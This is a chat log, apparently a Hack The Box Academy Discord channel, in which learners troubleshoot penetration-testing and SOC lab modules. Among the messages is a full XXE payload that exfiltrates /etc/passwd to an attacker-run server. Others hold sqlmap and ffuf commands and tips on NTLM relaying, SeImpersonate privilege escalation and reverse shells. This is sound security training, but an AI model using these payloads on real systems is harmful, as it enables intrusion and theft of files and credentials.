yess, perfect thank you very much !

It's sooo great, I'm amazed of how sysreptors saves us so much time

It also helps to follow the "Documentation and reporting" module for best practices

yess, I'm doing it right now ! It wasn't mentioned on the module, but I've saw so many people talking about it on the cpts talk that I had to check it out

or maybe I wasn't paying enough attention on the module

Check pinned messages

I believe they're pinned in the relative cert channels

ohhh, that's why

thank's !

Sysreptor wasn't available at the start, which is likely why it isn't mentioned

¯_(ツ)_/¯

Hello I’m a beginner at Hack the box, do I ask my task questions here?

which platform are you using, the main one or Academy?

The free version

are you currently doing Starting Point?

Yes

I’m stuck on the last task where it says submit root flag

you can ask questions related to Starting Point machines in #starting-point

I have no access to it

read and follow #welcome to access the channel

thanks

hi can anyone here help me out with public exploits in the penetration tester path, its part of the getting started module

im not really sure where to go after i found the open and filtered ports, since when i run searchsploit on each of the services running, it vomits out tons of exploits or leads me to irrelevant ones

look at open ports, what services are runing.

Hey I am stuck on a problem within the Soc analyst job path in the windows event logs section, im supposed to conduct a similar investigation as in the path however I dont understand what to do at all. Please help

#cdsa

ok so some updates on this, i can only find ssh, rpcbind, and unknown running on the open ports

i tried searching the number of the ports to find a common exploit somewhere but i couldnt find any

which section is it of getting started?

its the public exploits section

part of pentesting basics

wait

@rustic sage visit the given IP address, and scan the given address.
Look what services are running.

ohhh ok so since its a wordpress plugin ig im supposed to look for a vuln related to that
thanks!

Can somebody help me out w/ this lab in Shells & Payloads - Reverse Shells? No matter what I do, I can't seem to connect to the target box.
I can't reach the host on either UDP/TCP VPN, nor can I reach it via Pwnbox

Even though the host isn't responding to pings, I tried to RDP and I get a connection failed error each time.

Also if there's a tech support-specific channel, please let me know - not trying to clog up #modules if it's unwanted lol

if it's not working on even pwnbox, reach out support.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

I was just about to ask for that

Thanks!

just in case make sure you dont have the vpn running on your machine when you going to try it on a pwnbox

I'll give that a shot

sometimes using the vpn from your machine and using the pwnbox will not work

Indeed, if you connect from two places at once, the sessions will "fight" each other, resulting in each other disconnecting and reconnecting over and over again

(as only one connection per VPN profile is allowed at any one time)

So better use VPN or Either Pwnbox!

Disconnected, refreshed both the target system and pwnbox - still running into the same issue
I reached out to support though, thanks guys

Sorry, I only saw your message now, do you still need help?

Hi all, I have been going through CPTS and nearing the end but some modules I have so many issues with tools returning false negatives or false positives. I am doing "Attacking Common Applications - Skills Assessment II" and had to look at the solution only to find the gobuster command provided alsogives the wrong results. I am at a bit of a loss as to what to do and there must be others with the same issues. Is there a guide or wiki somewhere with these probably common issues? (I tried switching from udp to tcp with no joy)

(Using Kali WSL at the moment, but pwnbox and vms also have the same issue with false negatives)

https://academy.hackthebox.com/module/80/section/848
Tried brute forcing usernames with the xato-10 mil list, tried creating a user and tampering the cookie PHPSESSID but it wasn't encoded it in anything.
Not sure what else to try.

The HTB forum's show something related to the support element of the target but the target doesn't have anything like a support page or any support function. The other website buttons do nothing also except the login and register.

Any suggestions as to what I should try as am stuck on what to do

Hey... Can someone just tell me if I'm way off in the Skills Assessment of the Injection Attacks Module?

Well, if you don't have credentials, how would you get credentials according to the module?

Figure out the username which is failing.
Try making a user and seeing the requests (saw the profile.php and 2fa.php but can't use it)
Try making a user and modifying the cookie

why is figuring out the username failing

You need password too
Try bruteforce it

Wordlists exhausted.

Try changing wordlist

Tried all SecLists

you should use the one in the module

Then there would be some mistake in your command

Check your response carefully to use -fr flag in ffuf

he's most likely just not attacking the right thing

yeah but its so simple
just need to repeat the given payload

Can someone give me some help on the Skills Assessment of the Injection Attacks Module?

explain the problem
where did you stuck

I guess right in the end... Can't seem to get my XPath query right.... Or they always return true or always false

I may be making some stupid mistake in enumerating the XML schema

did you find the internal web

Yes

then just try to inject q parameter

That's what I'm trying with little success 😅

sections have given you payloads
just try to change in starting
maybe using a wildcard

I got results, but I may be over my head.... Don't know if the information I'm seeking is inside those nodes.

I'm starting to feel a little confused as to what I am simply learning, or what I am to currently be putting into effect. I'm going through the Information Security Foundations path as a complete beginner and I'm having a blast. I'm at the Setting Up module, learning about virtualizations and containers. What I'm confused on is if I am expected to currently install the software described, as it seems to suggest, or if I am simply learning about them. Some of the software requires a linux OS, which then makes it seem like I'm to install them on the digital workstation if I am supposed to install these, but it doesn't seem like I can. Could someone give me a bit of guidance?

Tried it already.... my iframe is too small to accommodate all the information even with increased size

the flag is there
just need to enumerate one by one

change the iframe size
may be it should
width="800" height="1600"

Thanks..... Went in a rabbit whole thinking it might be in a node outside of the ones enumerated in the Web Server file

Had set it to change the iframe size
may be it should
width="800" height="700"

will do

Thanks again

height 1600 would be helpful to see result nicely

I kept low due to the visualization breaking when I set to width="1000" height="1000"

you don't have to install everything in the module but it's good to have a linux vm for pentesting, popular choices are kali/parrot

I have set this
its up to you if you can see the result
#modules message

So should I be using my system for my active learning? (Rather than the digital workstation provided)

pwnbox is provided which is a browser parrot vm, but yes I'd recommend setting up your own

hey mods, so I'm experiencing a bug in terms of the number of cubes earned through subscription, but I can't find the support chat on the academy page anymore. So where can I disclose this bug now?

You should reach out to support on the site, not here.

Ok thank you! I appreciate your help. I'll focus on setting up my own vm using the softwares suggested in this module

there are also vidoes online on setting up kali/parrot in virtualbox/vmware if you need more materials

Sound good, thank you! I'll be back here once I find myself stuck once more haha

maybe you should read what I wrote? There is no support chat on the page anymore so that's why I'm asking here

There is no support on Discord for any purchases made. Contact support via the green box at the bottom right from Academy

If you do not see a green box, disable any adblockers

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Still won't do it for me, but thanks for the link which includes an email to the support team

they will get back to you asap, just know its still very early in the morning 😄

🙏Yes please

because i am close to breaking my computer,can anyone help me with this problem ```└──╼ $eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness

################################################################################

EyeWitness

################################################################################

Red Siege Information Security - https://www.redsiege.com

################################################################################

Directory Exists! Do you want to overwrite? [y/n] y
Starting Web Requests (8 Hosts)
Message: Expected browser binary location, but unable to find binary in default location, no 'moz:firefoxOptions.binary' capability provided, and no binary flag set on the command line

does it accept any argument for binary path?

Hi guys. I just notice that if i have a meterpreter session and if I have SeDebugPrivilege on the user I can migrate to a winlogon process and get SYSTEM just like that. It's not covered in the modules as far as I know but is this a common way to abuse SeDebugPrivilege?

this explains it to some extent - https://jlajara.gitlab.io/process-migration

i see an old github issue with the same error. it was about the docker version, but they say to use --headless flag
otherwise, it seems to be an issue with the selenium library, if firefox isnt installed or not in the default location

Thanks for sharing that.

also a good read is the documentation - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/windows/escalate/getsystem.md#3---token-duplication

eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness --headless like this?

i dont even know what --headless does,and it also says it doesnt recognize it

headless is a web browser without gui

haahahah didnt even know that ;p

so i cant do my module now,cool

Interesting. If i run getsystem none of the techniques used is successful but if i migrate to winlogon it works.

it is covered in Windows Privilege Escalation, although it's abused without Metasploit

https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1

ow... what os are you running on and do you have firefox installed in a custom location?
I see in eyewitness help that you can specify a log path for selenium:
--selenium-log-path SELENIUM_LOG_PATH Selenium geckodriver log path
it might be useful to check those logs and see where it is trying to fetch your firefox from.
it might be something simpler, i don't know, i'm just trying to figure out

Parrot Os

i skipped it for now,cus i got mad ;p

did you install it with apt?

Thanks.

yes!!

Module: Web Proxies
Section: Skills Assessment - Using Web Proxies
Link: https://academy.hackthebox.com/module/110/section/1055

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I am attempting to solve this using ZAP since Burp has throttled the request rate in the Community version. I know which encoders I have to use, however, the one of the encoders (|| ASCII Hex ||) is not an option within ZAP's fuzzer's processor. I tried looking for extensions to resolve this in the marketplace but didn't see anything. Is my only option to find a script that encodes or to write one myself? I'm kinda surprised ZAP has the encoder if you right click the cookie and try to encode/decode but doesn't have it under processors.

Try to see if you get the desired result here: https://gchq.github.io/CyberChef/

I'm pretty sure I'm using the right encoders already, the current issue is adding it to the fuzzer's processor.

Ended up using Burp

But if anyone knows a way to do it with ZAP, please lmk.

Only time I used ZAP was in the module :d

same

I can't get behind zap's ui and workflow

What about for Web scans?

I get for fuzzing you can probably use ffuf or gobuster or smtg else.

I have burp pro and its active scanner is very good

never used zap's scanner tbh

I used ZAP for its spider module

Oooh, nice.

same here, i used burp for that assessment. Maybe Caido if you want faster fuzzing, i havent check it about the processor tho

We need paid Burp version for that 😦

unfortunately yes

there is a burp plugin Turbo intruder which is free but less intuitive

Might try it some day

Can someone help me with the sqlmap module flag 5?
It always returns empty flag or wrong flag.
Maybe the network lag of the VPN might be affecting the decoding.
I think HTB should set shorter flags for SQLi.
sqlmap -u "http://94.237.59.193:36836/case5.php?id=1" --risk=3 --level=5 -T flag5 --no-cast --batch --dump --time-sec=10 --flush-session

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

I have a question what can I do now

dig hostname
is that true ?

👋 Hi everyone!
In the Command Injections - Advanced Command Obfuscation module (https://academy.hackthebox.com/module/109/section/1039) there is a tip: If you wanted to bypass a character filter with the above method, you'd have to reverse them as well, or include them when reversing the original command.
My questions are: How can one reverse a single character? And, wouldn't including them when reversing the original command still means that you include a filtered character (thus not having it accepted)?

htb is not an official top level domain
Therefore you must specify a name server.
dig hostname @ip_here

how do u talk in general

Please read #welcome and #rules

That will get you to #general

Hi everyone! I am doing the Attacking Common Applications module --> osTicket. I successfully completed the exercise, but the credentials that I used were gathered using dehashed (which a paid account is needed for retrieving said credentials). Is there any other way to complete the section without using the provided credentials and gathering them by yourself? Ty in advanced! ❤️

Hello everyone! I'm studying the Crest CPSA/CRT track and wondered if there's any study groups available. Why isn't there a dedicated channel for CREST exams like there is for CPTS CBBH etc.... ? Maybe admins would like to answer.

because crest exams are from a different platform

I understand that, however I feel if you're going to offer a service and we are paying for that service then go all in and offer a full service not some half hearted attempt.

the service does not include discord channels nor does it mention that it will, you get studying materials and exercises for your money. not to mention htb has their own certs

Fair point, I'm just a little frustrated there isn't a dedicated space where those studying the material can exchange thoughts and ideas.

this channel is for all academy modules, including the modules in the crest paths, so feel free to ask or discuss here

When performing NTLM relay attack as described in this section https://academy.hackthebox.com/module/116/section/1167, where does impacket-ntlmrelayx.py get the hash? I mean the hash is captured separately using either Responder or impacket-smbserver. In the impacket-ntlmrelayx.py command, we just pass the target, but not the hash. So, how does it know which hash to relay?

they should explain this concept better, 3rd time I'm seeing questions about this specific part this week

basically responder posions but not capture, and ntlmrelayx is the one capturing/relaying

Thanks for the explanation.

it doesn't know what to relay so it will just relay whatever it receives

you can specify it in the command but that's out of scope for this

This means if I don't need to poison, then I can omit starting responder and simply just use impacket-ntlmrelayx.py, right?

if you don't posion you would need to find another way to get targets to send a ntlm authentication to you

Yes. I am actually making SQL server to perform NTLM authentication against the SMB server. So, I don't need responder at all.

does anyone have the cheat sheet for the /bin

yep that's one way to do it

i meant gtfobins

Hay

gtfobins is the cheatsheet

hello

Question: Why do we need impacket-ntlmrelayx.py to relay the hash? Can't we simply perform Pass-The-Hash?

because it's a ntlmv2, you can't pass it

Hello Everyone,
I am facing HTB Academy modules mechains "Target is spawning...." Can't show IP in mechains .
what should I do plz guide me ?

They should spawn eventually. If not, contact support via the green box

i’m trying to run the enlightenment exploit to get root privileges, how do i actually run it? do i need to install the exploit on the target machine?

Switch VPN zones and try again

Yes you need to transfer it to the target. How else do you expect to get priv esc?

how would i transfer it? install on my host machine then use netcat?

you can try to capture it and you'll see a long string that is different every time, even if it's from the same user. because it uses a challenge and response mechanism to authenticate

I was try this but still can't resolve it

Yeah you can use nc

okay cool

i’ll give that a go

nc means?

net cat

(Linux command)

Ohh okay 👍

Netcat (nc) is a tool that lets you send and receive data over the network. It uses the TCP/IP protocol.

Take away: NTLM hash can be used for Pass-The-Hash but not NTLMv2. Instead, we need to relay the hash in case of NTLM v2.

correct, or crack it

Thanks 👍 i will try this

wait huh? how does nc help bud who can't spawn a target

Idk I replied to another person

The NC thing is not related to the thing @slender osprey is doing

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II

I have managed to get configuration file containing an MSSQL connection string. I captured the hash for the service, but relaying it fails. I do not know what to do next 🤐

check the file carefully

wait which question?

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

The service account doesn't have admin privileges

So, executing command from SQL session doesn't allow me to view the file inside the user directory of Administrator

check for other privileges

I can see two new prvileges:
SeImpersonatePrivilege Impersonate a client after authentication Enabled

SeCreateGlobalPrivilege Create global objects Enabled

yep one of them would do it

This is a technique that isn't taught in the path (yet), if you're confused

oh right

In https://academy.hackthebox.com/module/143/section/1275 section, it mentions this. But it says that it will be covered in "Windows PrivEsc" module

Exactly!

yeah just try that

😭

module File Inclusion/File inclusion Prevention/ ............ any hint for the first question? I have tried everything from the previous section

#modules

Oh wait this is modules

have you googled tho

yeah, what i found is not it

top result: https://askubuntu.com/questions/356968/find-the-correct-php-ini-file

you just need to match the version

embarrassing 🥲 , stupid question here: am i not to find the file inclusion vulnerability first?

I don't think so? the section is about prevention

the ip page is just showing, apache2 default page, that's normal right? or did something break

the question after I have to to a RCE and edit the php.ini

I believe you can just place the file in the web dir, since you have ssh access

can someone help me on how to save a file on the target machine using net at

my bad, those ssh , i thought that was for the pwndbox or something. I didnt even read !!!

netcat

im trying to transfer a file over to the target machine and save it but my netcat command just runs it

the creds provided above the questions are always for the module target

i can’t use scp either as i’ve got no permission

managed to figure it out using a http server

Pls don't spam

You have already sent that to another channel

I'm stuck on Dynamic Analysis in module Windows Evasion Techniques, can someone help me?
I'm repeat all steps from academy, but not working

Hello, can someone help me with module ' attacking web apps -> attacking splunk ' please ?
I have downloaded the malicious package from git, modified the IP and port number in run.ps1, and uploaded the app to the application manager. While doing this I have opened a netcat listener on the given port, but nothing happens.

I am trying to exploit the SeImpersonatePrivilege using JuicyPotato.exe. But I am getting the error:

I'm make exe file with micr0_shell and upload to victim Windows. Static analysis passed, but dynamic no

try with a lower number port, and if that doesn't work, use a different clsid

It worked with PrintSpoofer!

I don't exactly know the details yet. I will look into it when I am on Privilege escalation module

Okay . But what should I do?

Still hung up on the Injection Attacks Skills Assessment.... Can someone help me to whether I'm off and steering even further away 😅 or if I'm on the right track?

As already stated before: If changing the VPN region is not helping, you can either move on and try later, or contact support

does this mean ms01 is @172.16.7.3 ?

just found out it isnt --> what does this mean

Hello i have a small doubt in PASSWORD ATTACKS Specific (Credential Hunting in Linux) here in the question i have to find will pass and i get the .backup folder here shadow.bak and password.bak is available but i dont have permissions any hint how can i extract pass?

@uncut ocean you have to look elsewhere i guess...

i did most of the things my approach is to grab the shadow and passwd .bak files and unshadow them to grab hash

wrong approach i guess...

any hints 😵‍💫 i already spend tool much time in it

you have to unshadow, then crack the unshadowed hashes with hashcat

this is my approach but kira user is not in sudo group and i try to transfer file but failed

as i said...guessing this is the wrong approach...didnt solve it that way...

try other things...

like ????

try...

bruh !! i did and here we can use mimipenguin.py and laZagne.py they need root priv

so try another tool...almost there...

So no one!?

@uncut ocean try looking for headings ending with ....credentials in the module--> there should be the answer i guess

It’s the IP (+ port) of the DNS server you are querying

so it has nothing to do with ms01?

No

thx gpt...

`└──╼ $nslookup ms01 172.16.7.3
Server: 172.16.7.3
Address: 172.16.7.3#53

** server can't find ms01: SERVFAIL`

guess it was outputting it wrong...

actually this would have helped me...

Have u managed to solve it? Can I DM u?

It’s not a requirement, you can install a DC without it having the DNS role.
In the labs here there should be DNS on the DC though

use fqdn

@next bronze good hint.. works

Arrigato

Hi. I'm on the labs for the Attacking Common Services module. I enabled the walkthroughs after having done the easy and medium labs to compare my solutions. The medium solution doesn't seem to correspond to the challenge for the medium lab. It has extra steps that I did not need to do.

In fact it felt a bit like the medium lab was the easy lab and the easy lab was the medium lab!

Hi, I couldn't find an obvious answer after performing a search so I'm asking here. I get the following error when trying to connect to the HTB VPN: sitnl_send: rtnl: generic error (-101): Network is unreachable
I'm using sudo openvpn file.ovpn and I've already tried different VPN locations and both UDP & TCP. Any thought on what might be going wrong?

that error looks like you are having network issues

what does "ip a" show

are you sure you are connected to the internet- guessing so since you on discord

😄

🙂

just checking

yes i'm connected and don't have issue with other services that I can see

does it try and setup the tun/tap interfaces?

can you ping the servers? edge-us-academy-1.hackthebox.eu

https://paste.debian.net/1324344/

that ping is fine

(also the one that's in my ovpn file)

but it looks like its only the ipv6

that it's complaining about

whats the output of route -n

or netstat -rn

and ip a

but it exits

so obv not working

is it ok to dump the output of those commands here? not sure about this discord's etiquette 🙂

reboot, reinstall openvpn, download a new vpn file. if all doesn't work then best to contact support

can't setup the tun/tap interface

looks like

not sure if this is an oversight in the setup of the challenge

thank you for looking into it

Can someone just tell me if I'm supposed to brute-force all the Ids in the Injection Attacks Skills Assessment!?

Feel free to dm me your findings and I’ll help you

aparently you already did but didnt get a notification yet haha

I have a problem with the lab at the end of the Web Attacks - Blind data exfiltration. I created the xxe.dtd file as instructed by the course, I send the request to the good URL containing the body that they instructed me to write inside, i opened the php server, and i get the response back from the app, but no data is returned. Can anyone help me?

xxe.dtd (local .dtd):

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://<MY-IP>:8000/?content=%file;'>">

Request sent to the web server:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://<MY-IP>:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

Response i get from the web server opened locally on port 8000:

10.129.231.75 - - [25/Jul/2024 11:28:23] "GET /xxe.dtd HTTP/1.0" 200 -

damn, the reboot/reinstall did do the trick... 🤷‍♂️

If you didn't know, you can format code on discord by using triple "diagonal quotes" -> `. Triple quotes, new line, your code, new line, triple quotes

If i did know that, i would have done it 🙂

You can also edit your posted messages

The 2nd time I ask something here and I can say that stackoverflow community is nicer compare to this :)))

I am stuck in Skill Assessment of Information Gathering: Web Edition updated one. I am trying to fuzz the vhosts of provided domain, but using ffuf I am getting every subdomain as status 200 from wordlist. I am using /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt this wordlist, tried with other same thing. I don't know why all subdomains are giving status 200 with ffuf,

sudo ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://ip:port -H "Host: FUZZ.inlanefreight.htb" -fs 120

this is the ffuf command I am using.

So you just made a mean comment towards my post without even considering helping. Nice.

No it was so I could read it more easily, your code seems correct

1. did you try to query /327a6c4304ad5938eaf0efb6cc3e53dc.php directly?
2. did you start a php server instead of a python one?

// index.php
<?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

php -S 0.0.0.0:8000

Sorry, I am little bit frustrated with the labs at the end of each section of the modules.

No problem

I tried to query the file directly

!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/327a6c4304ad5938eaf0efb6cc3e53dc.php">

And with the php server opened as you mentioned, and i get this

[Thu Jul 25 11:23:46 2024] 10.129.231.75:37150 Accepted
[Thu Jul 25 11:23:46 2024] 10.129.231.75:37150 [200]: GET /xxe.dtd
[Thu Jul 25 11:23:46 2024] 10.129.231.75:37150 Closing

But nothing returned..

I also tried to not use the .php file to decode the content and just receive the content base64 encoded, and still nothing

It suddenly started to work...

Nice

Man, these labs are very bad...

The information is very good, but the machines that I have to exploit alwasy has problems, and I spend 2-4 hours to troubleshoot...

Is there any link where we can send feedback?

You can use /feedback

Here or is a special channel?

Here

Maybe try to switch to the closest vpn marked as "Low Load"?

I am doing the paths on a business account. I think these accounts have priority or something, idk.

But is a general problem with the machines and labs. I rode this on multiple forums, including the threads opened on the HTB forum...

when going through the pentesting modules did you guys use pwnbox or your own vm? I perfer my own but its so clunky

I tried both and is the same..

why would your own vm be clunky

I dont have the best PC , I dedicated the right amount of ram to the VM its just super slow

and CPU's

kali will run fine on 4 vcores and 4 gigs of ram

I did that and theres delayed typing, takes forever to pull up firefox and other apps etc

no background processes runinng either

i had the same issue with the keyboard delay, i sorted it by checking virtualize IOMMU

sweet thank you

just the option wasnt available when i used an kali vmware image, i had to install from iso to get the boxes ungrayed

that's an intel only thing I think

ah yeah you're right i just checked the vmware doc. Does the keyboard delay issue happen on amd as well? it doesn't seem to be a widespread problem though, doesn't happen with a windows vm for instance.

Please can someone help me with "Attacking common applications -> Attacking Splunk" ? I think that I've followed the instructions, but I don't get the reverse shell.

Sup, yes finished the module, send me a friend request

I've generally not have much issues with vm performance so I can't say, used a good number of pc/laptop with chips from both comapines and they're both fine

there was some problems with vmware on the big little architecture but it's mostly fine now

I'm on the Attacking Web Applications with Ffuf module and just passed the vhost fuzzing section. And it brought up a question in my mind, is there a way to discover a sub-domain that's not public and associated with a different IP address from the one we know?

For example: Let's say we're given the domain example.com and it's IP address is 192.168.0.10. If there was a sub-domain private.example.com that wasn't listed in any public DNS-record and associated with a different IP address, would it be possible to find it? If so, how?

Is there a best channel to request OpenVPN assistance? I'm having trouble connecting to HTB

hey jeff, there is a few steps in this attack, it is kinda hard to say like that why you do not get a reverse shell

Can I talk to you directly, I've been waiting 3hours for a reply, like a bottle in the sea 🙂

if there's a dns server than can resolve this you can just pull the dns server there

if there's no dns records anywhere would anyone know that's where that subdomain would point to in the first place

i don't know if i can't help much more than the details on the course material. I checked my notes and there is nothing much than the course process, so i guess if you follow the course you'll get a shell back. Maybe you miss one step somewhere?
all i got more than the course is this and it will not help here:

Note: restart the splunk service on unix type machines for this to work. No restarts are needed on windows machine.```

But let's say there isn't a DNS server that can resolve private.example.com and even the host file doesn't have an entry, then it's impossible, right?

So it is impossible to discover it if there's no DNS record anywhere and it's associated with a different IP address?

but nmap says that splunk runs on a windows machine

in that case if it's not associated at all you might as well treat private.example.com as a seperate website

Alrighty, thanks!

haha yeah that why i said it will not help here, sorry for confusing you. I just shared what i got

anyone any help? I believe the server is set to respond a default page therefore I am getting a response for every vhost even starwars.inlanefreight.htb gave me 200 🤣

I searched on Discord and 'many' people have had the same problem. We don't know if they have solved it or not.

follow the section to the T and you'll get it

I don't remember much but that's what I did for that part

you can filter out the size that you don't want

every response is 120 size so if I filter I get none

that's why I am stuck I can't find any valid subdomains

wait for it to finish

in your run.ps1 file, did you use port 443 like in the course material? No typo in the IP? did you remove comments etc

Absolutely

yes I did wait for ffuf to complete its fuzzing with filter and I got none

are you fuzzing using the domain name instead of ip and port?

like said before, it should work if you follow the course. Or there is another issue we arent able to see from here.
I can't spin up a target right now to test it but i might give it a go later.
maybe useless but i would try to refresh the vpn, respawn a target and start from scratch.

I've restarted from scratch 3 times, and I can't see my mistake. If you can check on your end, it would be great.

Module: Attacking Web Applications with Ffuf
Section: Parameter Fuzzing - POST
Link: https://academy.hackthebox.com/module/54/section/508

Is there a resource to check which content type to use when fuzzing POST requests? For example, with PHP, the POST request can only accept content type application/x-www-form-urlencoded.

yes, and after checking some more I can access http://inlanefreight.htb:54495 in my browser but when I try to curl it curl http://inlanefreight.htb:54495 I get failed connection error

so it is becoming more confusing for me now

it works fine for me

reset it

well after resetting curl works fine but even now I can't fuzz properly

still getting all host with status 200 with response size 120

just tried it and it worked for me

Isn't the answer to this: How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
ss -lH | wc -l? Or am I misreading the question?

ok i misunderstood "not on localhost and IPv4 only"; English issue I guess 😄

i understood it as !(localhost & ipv4 only) whereas it was meant as !ipv6 !localhost

man why me🥲

are you getting valid vhosts?

yep

i've got same problem with ffuf but gobuster works fine i really don't know why it is so

you can try to run them both via burpsuite and see what their output actually is

Anyone know anything about this?
#modules message

can someone help me in the wordpress hacking module section Directory Indexing. i have tried looking to wp-includes and wp-content but cant find the flag.txt anywhere. have also tried using ffuf even though it says do it manualy bc just cant find anything

Lol I'm going to get mad 🙂 Tell me more

How did you do it

bruh i have student sub and i went for plat monthly and i just got it to unlock 2 modules but now i have to re get student sub and pay money again for it to access the rest of the cpts modules i wanted ;-;

just blindly followed the module...

Do you have a few minutes to open my eyes ?

ok i can try

privately ?

ok go DM

Module: Windows Privilege Escalation
Chapter: Interacting with Users
For the exercise, I need(ed) to see that our user has write privileges over a specific subfolder, but
smbmap -u htb-student -p '[...]' -H $TARGET -r 'Department Shares' --depth 10 doesn't list the write access of the subfolder

Question: how can I reliably recursively list the rights of files in a share from linux?

can someone pls help me?

you mean i should use proxychains configured to send traffic through a burp proxy? if it is so, I don't know why it doesn't work either 🙁

Yes that what I did but for some reason the subfolder rights are listed as readonly, while here one of the folder also has write right. Maybe it's due to the smb connection or the version of smbmap, idk
Spoiler: the subfolder with wright right is ||IT|| but it's displayed like the other subfolders

Are you using the right user account (the one with the write privilege) to connect to the share? (I haven't done this module yet)

Hey I have a question regarding the Soc analyst path I am on a module where we are reading windows event and sysmon. and it is asking me to do this - "By following the required steps, which involve renaming reflective_dll.x64.dll to WININET.dll, moving calc.exe from C:\Windows\System32 along with WININET.dll to a writable directory (such as the Desktop folder), and executing calc.exe, we achieve success. Instead of the Calculator application, a MessageBox is displayed" I already moved calc.exe to desktop, however I do not have the file reflective_dll.x64 in my pwnbox when I rdp into the target IP. The only thing that there is a github link to a repository that has that file name but I have no internet access when I rdp into the target ID so i have no idea how I am supposed to get this file.

I ran the command dir /s filename.dll and it is not in the vm and I was in the admin directory when I searched

Please help Idk what I am supposed to do im ngl

can someone help me in the wordpress hacking module section Directory Indexing. i have tried looking to wp-includes and wp-content but cant find the flag.txt anywhere. have also tried using ffuf even though it says do it manualy bc just cant find anything

I have to admit this one took me a while. Now I realize I need to go study assembly language, shellcode and C in a lot more detail if I want to be even half decent

for me gobuster is also not working

Yes I created a file in the subfolder with smbclient and the same credentials

pls someone help me

Feel free to dm me

thc u

@gleaming thistle what error did you receive when you inputted dir /s filename.dll

File not found, I used ChatGPT and realized it was because I was in the wrong directory. I was under the impression that the higher you are in the directory list the further you can search so I was in the admin directory doing /s to find the file but I should have been in tools directory and used /s there to find the file

Why? Lol

Ahhh ok I see what happened. Yeah if you want to execute most of the programs you have to be in the corresponding directories. Especially when you start getting into psget or SilkETW

Or specify full filepath

Yup that too! Windows is fun like that -_-

why what?

What modules did you need to unlock?

they were the t3 AD modules

Those are unnecessary for cpts

i unlocked them, then found out i have to re subscribe back to my student & pay more

yea additional learning

Well yeah, you can't have 2 active subs

yea found that out

That's kinda common sense

idk yea if you think about it like that

It should also have given you the "upgrade/downgrade to" message

yea i thought i could get those cubes man and pay that amount for that sub and i would still have my student sub cuz the month didnt end and i have my student email in my ac count

Also prob smarter to do the extra stuff at the end of the path

cool 👍

Depends, monthly subs aren't from the first to last of month. They are roughly based on sub date

I.e. if you subbed on the 15th, it rolls over every 15th

yep and its recurring so i would be constantly in my monthly sub i didnt think it would just cut it off right there as soon as i upgraded & now i have to pay more for the rest of the month that i had remaining

Well thank you!

When you upgrade/downgrade sub it's immediately afaik

yes a month subscription is immediate so i wanted to upgrade immediately for plat monthly and get the cubes, and I hoped i would still have my student sub for the remainder of the month and it wouldnt cut it off since i already paid for the month

If you need anymore help don't hesitate to ask. I'm on the same mini module as you are lol

nevermind though

Thank you! I mean its just getting stumped over and over again each question takes me forever to try and figure out lol

I get it lol. There is no rushing on these modules. I ran into my fair share of bumps for this module and I'm sure there will be plenty more lol

no you can just use the directly ffuf and gobuster flags for proxying, check the help I don't have them in my head at the moment, no need for proxychains

message support or submit /feedback ¯_(ツ)_/¯

Or both

Genuinely, stop using chatGPT; take notes; and apply your brain more. Also if you're struggling with the soc analyst path, do the soc analyst pre-requisite path

Its just a little hard to follow what they want me to do, which I fully understand it is so that I can actually learn. Its just a little difficult to follow

Then take notes

ChatGPT can often be wrong when trying to figure certain things out

It's not a search engine, it's an LLM and guesses what to say next

I dont use chatgpt to anwser the question for me I use it when for example I would say "Hey what is the command to look do whatever"

To do whatever*

Yeah even commands can be hit/or miss

But no i fully understand

And it can even overcomplicate it

Speaking of helping though, Im stuck again

Tip when you're stuck. Walk back through slowly

Don't just rush for help whenever you hit a bump

you should just maybe just learn to prompt gpt better. There are techniques to get better results, it is not just about throwing question at it.

If you're meant to get a reverse shell, for instance, did you skip over where it said to set up your listener

Also; https://dontasktoask.com

I'm having trouble with living off the land section of file transfers because I get access to target windows box but then I can't use certutil just because it won't accept -Post parameter. I can't download latest version of cert util onto windows box because no internet for the Windows target.

Is this on purpose and what do you propose I do?

You don't need the latest version

well, but the -Post parameter won't work

But also I don't recall being able to -Post with certutil

Guys the issue isnt if im using GPT or if im taking notes or if im rushing. The issue is that it is hard to follow. for example right now it saying to do this "To showcase unmanaged PowerShell injection, we can inject an unmanaged PowerShell-like DLL into a random process, such as spoolsv.exe. We can do that by utilizing the PSInject project in the following manner." and then it shows me some code. The code isnt ran on powershell or cmd, and I know the purpose is to make spoolsvc from a unmanaged state to a manages state in hack processor.

Im not asking for help though*

Here's what the section says to do with certreq:

Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)```

Follow along with the module

big thanks 😀

sorry I meant certreq not certutil

timed out

O.o

That's not "not accepting post"

Wrong IP btw

ok I know when I it I use right IP

I just copied the section

I know but it still says to do it in section

Yeah like what @fathom pendant you should take your time reading through it. You are going to be utilizing cmd or powershell alot in this module

yeah some phrasing might be hard to follow and those cdsa modules can be quite steep if you do not have a broad enough fundamental knowledge.

I had to go through it a few times one step at a time to see what it was doing and how it affected it

can someone help me with this section? I'm not getting something about the section because its telling me to use certreq but only certreq command on entire page results in an error

